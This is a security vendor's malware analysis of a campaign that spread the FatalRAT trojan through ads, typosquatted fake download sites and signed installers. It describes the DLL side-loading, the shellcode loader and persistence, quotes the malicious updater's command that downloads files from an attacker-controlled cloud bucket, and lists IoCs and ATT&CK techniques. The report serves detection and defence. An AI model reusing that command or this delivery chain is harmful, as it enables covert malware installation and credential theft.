ESET researchers have identified a campaign using trojanized installers to deliver the FatalRAT malware, distributed via malicious websites linked in ads that appear in Google search results
ESET researchers identified a malware campaign that targets Chinese-speaking people in Southeast and East Asia by buying misleading advertisements to appear in Google search results that lead to downloading trojanized installers. The unknown attackers created fake websites that look identical to those of popular applications such as Firefox, WhatsApp, or Telegram, but in addition to providing the legitimate software, also deliver FatalRAT, a remote access trojan that grants the attacker control of the victimized computer.
Figure 1 shows a heatmap with the countries where we detected the attacks between August 2022 and January 2023. Most of the attacks affected users in Taiwan, China and Hong Kong.
We also observed a small number of cases in:
A simplified overview of the attack is shown in Figure 2. A chain of multiple components ultimately installs the FatalRAT malware that was described by AT&T researchers (@attcyber) in August 2021.
The attackers registered various domain names that all pointed to the same IP address: a server hosting multiple websites that download trojanized software. Some of these websites look identical to their legitimate counterparts but deliver malicious installers instead. The other websites, possibly translated by the attackers, offer Chinese language versions of software that is not available in China, such as Telegram, as shown in Figure 3.
We observed malicious websites and installers for these applications, roughly in order of popularity:
Electrum Bitcoin wallet
Sogou Pinyin Method, a Chinese Pinyin input method editor
Youdao, a dictionary and translation application
WPS Office, a free office suite
You can see other fake websites in the gallery shown in Figure 4 (click on an image to enlarge it). Apart from electrumx[.]org, a fake website in English for the Electrum Bitcoin wallet, all the other websites are in Chinese, suggesting that the attackers are mostly targeting Chinese speakers.
Figure 4. Fake websites created by the attackers to deliver malicious installers (click to enlarge)
While in theory there are many possible ways that potential victims can be directed to these fake websites, a news site reported (English version here) that they were being shown an advertisement that led to one of these malicious websites when searching for the Firefox browser in Google. We couldn’t reproduce such search results, but believe that the ads were only served to users in the targeted region. An example is shown in Figure 5 (image from the original post above). We reported the websites to Google and the ads were taken down.
Given the fact that many of the domain names that the attackers registered for their websites are very similar to the legitimate domains, it is also possible that the attackers rely on typosquatting as well to attract potential victims to their websites. Some examples are:
telegraem[.]org (fake) vs. telegram.org (legitimate)
electrumx[.]org vs. electrum.org
youedao[.]com vs. youdao.com.
You’ll find the rest of the domain names that we observed in the IoCs section.
The installers downloaded from the fake websites are not hosted on the same server as the websites, but in the Alibaba Cloud Object Storage Service. They are digitally signed MSI files (see the Certificates section) created with Advanced Installer. Figure 6 shows the malicious installers that the attackers uploaded to the cloud storage on January 6th, 2023.
When these installers are executed, they usually:
Drop and execute the malicious loader, and files needed to run the FatalRAT malware, in the %PROGRAMDATA%Progtmy directory.
Drop the malicious updater and related files in the %PROGRAMDATA%Progtmy directory.
Drop a file named ossutilconfig in the %USERPROFILE% directory. This file contains credentials used by the updater to connect to a remote bucket in the Alibaba Cloud.
Create an empty directory %PROGRAMDATA%Progptp (although we observed some cases where the FatalRAT malware was installed in this directory instead).
Drop and execute the legitimate installer in C:Program FilesCommon Files (see CommonFiles64Folder).
Create scheduled tasks to execute the loader and updater components.
The malware is run by side-loading a malicious DLL, libpng13.dll, which is used by sccs.exe (Browser Support Module), a legitimate executable developed by Xunlei. The original libpng13.dll is also included in the installer package (renamed to what appears to be a random name) because the malicious DLL forwards its exported functions to the original DLL. Some of the forwarded exports in the malicious DLL are shown in Figure 7. The image shows that the original DLL was renamed to BHuedjhd.dll in this example and that the malicious DLL was compiled as Dll22.dll.
The malware updater is executed in a similar manner, by side-loading dr.dll, used by a legitimate, signed binary developed by Tencent. The malicious DLL is very simple and executes OSSUTIL (included in the installer package as ssu.exe) to download files from an attacker-controlled bucket in Alibaba Cloud. The command executed by the DLL is:
cmd /C “C:ProgramDataProgtmy2ssu.exe cp -r oss://occ-a1/dll/3/ C:ProgramDataProgtmy –update”
This should update files in the %PROGRAMDATA%Progtmy local directory from the remote bucket occ-a1 (a different bucket than the ones used to store the installers, but in the same account), but it doesn’t work in any of the installers that we analyzed because the %PROGRAMDATA%Progtmy2 subdirectory doesn’t exist (it should be subdirectory 0, created by the installer).
The attackers made the same mistake with the scheduled tasks created for the updater, as the execution path also refers to a subdirectory 2 that doesn’t exist. In most cases, four scheduled tasks are created: two for the RAT (one set to execute periodically and the other whenever any user logs into the PC) and two for the updater. The names of the tasks are based in the Windows build number and the name of the computer, as shown in Figure 8.
The loader – libpng13.dll – is a very simple component that opens and executes in memory a file named Micr.jpg, located in the same directory as the DLL. The attackers have obfuscated the loader with many calls to a function that just prints some hardcoded values. It’s possible that this behavior was used to avoid being detected by security solutions or to complicate the analysis of the DLL.
Figure 9 shows an example of the obfuscated code on the left and the deobfuscated code on the right.
Micr.jpg is actually shellcode that also contains an embedded DLL. The purpose of this shellcode is to load and execute in memory the embedded DLL by calling an export function of the DLL named SignalChromeElf. Before the execution of this export function, the shellcode reconstructs the imports table of the DLL and calls the DllEntryPoint, which simply invokes the Windows API function DisableThreadLibraryCalls as a way to increase the stealthiness of the DLL.
SignalChromeElf essentially will decrypt, load, and execute an encrypted payload located in the embedded DLL. This encrypted payload is the FatalRAT malware, and after its decryption the DLL will find the address of an export function called SVP7, which contains the entry point of the malware, and call it, passing the encrypted configuration of FatalRAT as an argument.
The function in the embedded DLL that decrypts the payload is the same as the function used in FatalRAT to decrypt its configuration. An example of this function is shown in Figure 10.
FatalRAT is a remote access trojan documented in August 2021, by AT&T Alien Labs. This malware provides a set of functionalities to perform various malicious activities on a victim’s computer. As an example, the malware can:
Change the victim’s screen resolution
Terminate browser processes and steal or delete their stored data. The targeted browsers are:
Download and execute a file
Execute shell commands
This malware contains various checks to determine whether it’s running in a virtualized environment. Depending on its configuration, these checks may be executed or not.
From our own analysis we were able to determine that the FatalRAT version used in this campaign is very similar to the one documented by AT&T in their blogpost, so we won’t go into more details. A comparison of them is shown in Figure 11, and Figure 10 shows the decompiled code used to decrypt strings in the FatalRAT samples from this campaign, which is the same as the one described by AT&T.
We found a previous version of the malicious installer that the attackers have used since at least May 2022. Unlike the installers that we described previously, this version contains an XOR-encrypted payload, divided into three files: Micr.flv, Micr2.flv, and Micr3.flv, each file encrypted with a different, single byte XOR key. Once decrypted, the content of the three files is concatenated, forming shellcode that contacts a C&C server to download and execute further shellcode.
The loader DLL in this case is named dr.dll – the same name that is used for the update mechanism in later versions of the installer, side-loaded by the same legitimate executable. Given that this older version doesn’t seem to have an updater, we believe that the attackers have replaced it with the new version of the installer since August 2022.
Twitter user Jirehlov Solace reported other versions of the installers starting in May 2022, as can be seen in this thread. Although some of those installers are the same as ones in this report, it seems that most of them are different, compiled as EXE files (not MSI installers) and using a variety of software packers. Those samples are probably connected with Operation Dragon Breath as described by Qi An Xin in May 2022.
The attackers have expended some effort regarding the domain names used for their websites, trying to be as similar to the official names as possible. The fake websites are, in most cases, identical copies of the legitimate sites. As for the trojanized installers, they install the actual application that the user was interested in, avoiding suspicion of a possible compromise on the victim’s machine. For all of these reasons, we see how important it is to diligently check the URL that we are visiting before we download software. Even better, type it into your browser’s address bar after checking that it is the actual vendor site.
Since the malware used is this campaign, FatalRAT, contains various commands used to manipulate data from different browsers, and the victimology is not focused on a particular type of user, anyone can be affected. It is possible that the attackers are solely interested in the theft of information like web credentials to sell them on underground forums or to use them for another type of crimeware campaign, but for now specific attribution of this campaign to a known or new threat actor is not possible.
ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.
SHA-1FilenameESET detection nameDescription
00FD2783BBFA313A41A1A96F708BC1A4BB9EACBDChrome-Setup.msiWin32/Agent.AFAHMalicious MSI installer.
3DAC2A16F023F9F8C7F8C40937EE54BBA5E82F47Firefox-x64.msiWin32/Agent.AFAHMalicious MSI installer.
51D29B025A0D4C5CDC799689462FAE53765C02A3LINE-Setup.msiWin32/Agent.AFAHMalicious MSI installer.
64C60F503662EF6FF13CC60AB516D33643668449Signal-Setup.msiWin32/Agent.AFAHMalicious MSI installer.
2172812BE94BFBB5D11B43A8BF53F8D3AE323636Skype-x64.msiWin32/Agent.AFAHMalicious MSI installer.
3620B83C0F2899B85DC0607EFDEC3643BCA2441DSogou-setup.msiWin32/Agent.AFAHMalicious MSI installer.
1FBE34ABD5BE9826FD5798C77FADCAC170F46C07Whats-64.msiWin32/Agent.AFAHMalicious MSI installer.
23F8FA0E08FB771545CD842AFDE6604462C2B7E3Whats-Setup.msiWin32/Agent.AFAHMalicious MSI installer.
C9970ACED030AE08FA0EE5D9EE70A392C812FB1BWhatsApp-中文.msi (machine translation: Chinese)Win32/Agent.AFAHMalicious MSI installer.
76249D1EF650FA95E73758DD334D7B51BD40A2E6WPS-SetuWhatsApp-中文p.msi (machine translation: Chinese)Win32/Agent.AFAHMalicious MSI installer.
DBE21B19C484645000F4AEE558E5546880886DC0电报-中文版.msi (machine translation: Telegram – Chinese Version)Win32/Agent.AFAHMalicious MSI installer.
1BE646816C8543855A96460D437CCF60ED4D31FE电报中文-64.msi (machine translation: Telegram Chinese)Win32/Agent.AFAHMalicious MSI installer.
B6F068F73A8F8F3F2DA1C55277E098B98F7963EC电报中文-setup.msi (machine translation: Telegram Chinese)Win32/Agent.AFAHMalicious MSI installer.
2A8297247184C0877E75C77826B40CD2A97A18A7windows-x64中文.exe (machine translation: Chinese)Win32/ShellcodeRunner.BRMalicious installer (older version).
107.148.35[.]6PEG TECH INC2022-10-15Server hosting malicious websites.firefoxs[.]orggooglechromes[.]comyouedao[.]comtelegramxe[.]comtelegramxe[.]nettelegramsz[.]netwhatcpp[.]comwhatcpp[.]netwhatsappt[.]orgtelegraem[.]orgtelegraxm[.]netskype-cn[.]orgelectrumx[.]orgline-cn[.]netwhateapp[.]netwhatcapp[.]org
107.148.45[.]20PEG TECH INC2022-12-1912-03.telegramxe[.]com; C&C server.
107.148.45[.]32PEG TECH INC2023-01-0412-25.telegraem[.]org; C&C server.
107.148.45[.]34PEG TECH INC2023-01-0612-25.telegraxm[.]org; C&C server.
107.148.45[.]37PEG TECH INC2022-12-1012-08.telegraem[.]org; C&C server.
107.148.45[.]48PEG TECH INC2022-12-2212-16.pinyin-sougou[.]com; C&C server.
193.203.214[.]75Yuhonet International Limited2022-06-16ghg.telegream[.]online; C&C server.
Valid from2022-12-16 11:46:19
Valid to2023-12-16 12:06:19
Valid from2022-06-02 11:10:49
Valid to2023-06-02 11:30:49
MITRE ATT&CK techniques
This table was built using version 12 of the MITRE ATT&CK framework.
Resource DevelopmentT1583.001Acquire Infrastructure: DomainsThe attackers acquired domain names for their malicious websites and C&C servers.
T1583.003Acquire Infrastructure : Virtual Private ServerThe attackers acquired VPS servers to store their malicious websites.
T1585.003Establish Accounts: Cloud AccountsThe attackers acquired accounts in Alibaba Cloud Object Storage Service to host their malicious MSI installers.
T1608.001Stage Capabilities: Upload MalwareThe attackers uploaded their malicious MSI files to Alibaba Cloud Object Storage Service.
T1587.002Develop Capabilities: Code Signing CertificatesThe attackers used self-signed certificates to sign their malicious MSI Installers.
Initial AccessT1189Drive-by CompromiseThe attackers used Google Ads to direct their victims to their malicious websites.
ExecutionT1204.002User Execution: Malicious FileThe attackers have relied on their victims to execute the malicious MSI installers.
T1059.003Command and Scripting Interpreter: Windows Command ShellThe malware updater uses cmd.exe to download files from Alibaba Cloud Object Storage Service.
T1106Native APIThe loaders use API calls such as VirtualAlloc to load and execute malicious components into memory.
PersistenceT1053.005Scheduled Task/Job: Scheduled TaskThe MSI installers create scheduled tasks to achieve persistence.
T1547.001Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderFatalRAT creates a registry Run key to achieve persistence.
Defense EvasionT1140Deobfuscate/Decode Files or InformationThe loaders and FatalRAT component use various encryption algorithms to hide payloads and strings.
T1027.007Obfuscated Files or Information: Dynamic API ResolutionThe loaders use dynamic API resolution to avoid detection.
T1574.002Hijack Execution Flow: DLL Side-LoadingThe attackers have used DLL side-loading to execute their malicious payloads.
T1497.001Virtualization/Sandbox Evasion: System ChecksFatalRAT performs various checks to detect whether it’s running on a virtual machine.
T1027.009Obfuscated Files or Information: Embedded PayloadsThe Micr.jpg file contains shellcode and an embedded DLL file that loads FatalRAT.
T1553.002Subvert Trust Controls: Code SigningThe attackers have used self-signed certificates to sign their malicious MSI files.
CollectionT1056.001Input Capture: KeyloggingFatalRAT has keylogger functionalities.
T1119Automated CollectionFatalRAT automatically collects information from a compromised machine and sends it to the C&C server.
Command and ControlT1573.001Encrypted Channel: Symmetric CryptographyFatalRAT encrypts data with a custom encryption algorithm before it is sent to the C&C server.
T1095Non-Application Layer ProtocolFatalRAT uses TCP for C&C communications.
ExfiltrationT1020Automated ExfiltrationFatalRAT automatically sends information from a compromised machine to its C&C.
T1041Exfiltration Over C2 ChannelFatalRAT exfiltrates data over the same channel used for C&C.